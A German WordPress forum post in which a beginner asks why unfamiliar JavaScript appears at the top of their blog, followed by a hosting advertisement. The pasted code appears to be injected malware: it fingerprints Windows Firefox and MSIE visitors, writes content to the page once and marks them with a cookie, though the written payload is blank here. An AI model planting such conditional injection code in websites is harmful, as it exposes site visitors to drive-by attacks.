hilfe, blog wird seltsam dargestellt.

• Hallo,

ich bin quasi WP-Anfänger, kenne mich also nciht allzugut aus, bisher hat aber alles prima funktioniert.

Jetzt rufe ich grade mal meinen Blog auf, weil ich was überprüfen wollte, da sehe ich, dass ganz oben ne Menge Text steht, der da nciht hingehört. Sieht wie Code aus.
    Wo kommt das her?????

Hier der text:
    function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write(' '); set_cookie('toppedup', '1010101');}>

Kann mir das jemand erklären was da passiert ist?

Danke schon mal im voraus für Unterstützung.

Gruß
    snooopy

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!